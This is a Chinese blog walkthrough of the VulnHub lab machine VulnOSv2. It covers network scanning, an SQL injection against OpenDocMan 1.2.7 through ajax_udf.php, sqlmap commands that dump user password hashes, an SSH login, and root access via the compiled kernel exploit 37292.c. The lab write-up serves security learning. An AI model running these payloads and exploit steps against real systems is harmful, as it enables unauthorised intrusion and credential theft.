Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

已于 2022-02-11 16:54:39 修改
阅读量2.2k 收藏 1
点赞数 2
分类专栏: 靶机学习 文章标签: 安全 网络 linux
于 2021-12-05 18:43:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121725922
版权

VulnOSv2 write up

0x00 环境搭建

在这里插入图片描述
VritualBox配置网络为 host-only
VMware中kali加入 host-only 为Virtual Box的网卡

开启虚拟机报错 usb 2.0 什么的问题
修改usb设备为1.0

在这里插入图片描述

0x01 信息收集

  • ip探测
    netdiscover -i eth1 -r 192.168.56.0/24
    在这里插入图片描述

100是网关 101 是win10 104就是靶机

  • 端口服务识别

masscan -p 1-65535 --rate=1000 192.168.56.104

nmap -sC -sV -A -p 80,6667 192.168.56.104 -o port.txt

在这里插入图片描述

开启了
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open irc ngircd

OS details: Linux 3.2 - 4.9

0x02 漏洞挖掘

web思路

目录枚举 查看各个功能点 源码
手工+ 扫描器 cms

步骤一:枚举目录+主页挖掘

(1)kali dirsearch dirbuster 枚举
(2)审查主页各功能点

在这里插入图片描述
在这里发现一处隐藏目录 /jabcd0cs/

访问 http://192.168.56.104/jabcd0cs/

好像存在cms
在这里插入图片描述

步骤二:OpenDocMan v1.2.7 cms利用

(1)搜索OpenDocMan v1.2.7 cms漏洞

searchsploit OpenDocMan 1.2.7
在这里插入图片描述
searchsploit -m 32075

拷贝到当前目录

cat 32075.txt 查看利用方法

在这里插入图片描述

(2) 利用 漏洞

exp

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

爆表名

http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

在这里插入图片描述

直接用sqlmap吧

爆库名

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --level 3 --batch

在这里插入图片描述

爆表名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs --tables

在这里插入图片描述

爆可能存在账号密码的字段名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user --columns

在这里插入图片描述

爆username和password的字段值

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user -C username,password --dump

在这里插入图片描述
webmin | b78aae356709f8c31118ea613980954b |
| guest | 084e0343a0486ff05530df6c705c8bb4 (guest)

在这里插入图片描述

步骤三:尝试利用账号面ssh连接webmin

登录成功

在这里插入图片描述

0x03 提权

思路
内核漏洞提权
翻/bin/bash 用户的 文件找密码

步骤四:内核漏洞提权

(1) 查看exp
./linux-exploit-suggester.sh -u “Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux”

在这里插入图片描述
发现 dirtycow 和37292均可

(2) 下载 exp

searchsploit -m 3729

在这里插入图片描述
(3) gcc 编译 运行
gcc -o exp 37292.c

./exp

提权成功
在这里插入图片描述

之后尝试 dirty cow 40839.c的时候 把靶机搞崩了
还是有其他的先试其他的吧

在这里插入图片描述

0x04 总结

本靶机 比较简单
通过OpenDocMan 数据库管理系统存在的 sql注入漏洞 获取到 账号密码, 尝试登录ssh成功 直接 利用内核漏洞37292提权成功

LuckyCharm~
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020年12月10日- Vulnhub-TR0LL: 1 渗透学习
AnonyMousIT的博客
01-01 174
NO1: Vulnhub-TR0LL: 1 渗透学习 一、介绍 二、情报收集 首先发现靶机的IP地址: nmap -sP 192.168.31.0/24 发现靶机IP 发现开发着 21、 22、 80端口 其中ftp允许匿名登陆,存在secret目录和robots文件 登录ftp: 可以发现登录成功 发现一个lol.pcap文件 下载到本地,使用wireshark分析 Well, well, well, aren’t you just a clever little devil, you a
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2177
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习
最新发布
jockerboss的博客
03-05 849
VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习
7.100个渗透测试实战#7(Biilu_b0x)
qwsn
03-27 2598
世间一切皆可努力 ...
VulnHub系列】Typhoon-v1.02靶机
薛定谔嘚喵博客
03-11 367
1)信息收集1、nmap信息挖掘。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。2)根据网页信息提示尝试ssh远程登录3)提权:1、内核提权
个人文档管理工具OpenKM安装设置及汉化过程
qq_38566306的博客
04-27 4543
为了更好地管理自己的文档(未必能坚持用下去啊O(∩_∩)O哈哈~),这几天比较了几款免费开源的文档管理工具。其中LogicalDoc安装很顺利,使用也OK,但是社区版的只能预览PDF文件,这就很不爽了。同时,也不具有字典、类别等功能,搜索方式较简单吧——初步印象。OpenDocMan似乎只是文档管理,没有预览功能。国产的几个,限制文件尺寸,不实用。OpenKM一开始尝试了一次,由于不是JDK1.8,安装失败,就放弃了;后来了解到OpenKM支持各种文档的预览,还有字段、类别等功能,甚合我意。折腾了一...
vulnhub 靶机 GOLDENEYE: 1
qq_44029310的博客
07-07 847
涉及知识点:pop3邮件服务器,隐写,hydra爆破,Moodle系统漏洞,反弹shell中base64编码绕过,CC编译。
ubuntu本地内核提权37292.c
08-06
ubuntu本地内核提权
opendocman:OpenDocMan-免费PHP文档管理系统DMS
03-11
OpenDocMan 免费PHP文档管理系统DMS OpenDocMan是一个用PHP编写的基于Web的文档管理系统(DMS),旨在符合ISO 17025和OIE文档管理标准。 它具有对文件访问的细粒度控制以及自动安装和升级的功能。 特征 * Upload files using web browser * Control access to files based on department or individual user permissions * Track revisions of documents * Option to send new and updated files through review process * Installs on most web servers with PHP * Set up a reviewal process for al
vulnhub VulnOS: 2
箭雨镜屋
12-05 2494
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
kali之vulhub,medium_socnet
weixin_54431413的博客
05-06 1806
一、部署环境 二、进行主机发现,arp-scan进行扫描 三、使用nmap扫描发现的靶机IP 四、扫目录(dirsearch脚本;和windous御剑类似) 五、跳出docker容器系统隔离环境 六、内网穿透 七、对内网地址172.17.0.1进行扫描 八、对内网地址172.17.0.2进行扫描 九、利用开放的22端口ssh服务 十、提权 十一、成功拿到宿主机root权限
opendocman漏洞:不正确访问控制漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 443
opendocman漏洞详情.CVE ID:CVE-2014-1946 OpenDocMan是一款开源基于WEB的文档管理系统。 由于在更新用户的个人资料时“/ signup.php”脚本允许的动作未充分验证,远程身份验证的攻击者可以分配管理权限和完全控制应用程序
VulnHub-GoldenEye-学习记录
m0_51313985的博客
10-17 305
前言:最近有点迷茫后面的路不知道该怎么继续往下走,再团队师傅的指点下我开始对vulnhub的靶场进行学习,比较好的一点是靶机是从外网到内网的一整个过程,可以系统性的进行学习 关于靶机的教程网上已经有很多师傅写了,第一次打这种靶机也是参照了师傅们的方法,希望后面能养出自己的思路 首先把靶机从官网down下来,安装完靶机之后开始复现 1.nmap扫描 靶机是NAT桥接,共享的本机ip,使用nmap扫描本网段 基础的nmap指令百度一搜就有,这里就不放了 这里发现了目标ip:192.168.149.130 开始
opendocman漏洞‘ajax_udf.php‘多个SQL注入
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 209
opendocman漏洞'ajax_udf.php'多个SQL注入漏洞详情:Bugtraq ID:65775 CVE ID:CVE-2014-1945 OpenDocMan是一款开源基于WEB的文档管理系统。 对通过"add_value" GET参数和"table" GET提交给ajax_udf.php的输入缺少充分过滤,允许攻击者利用漏洞进行SQL注入攻击,可获得敏感数据库信息或控制应用系统。 0 OpenDocMan 1.2.7.1 厂商补丁: OpenDocMan
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值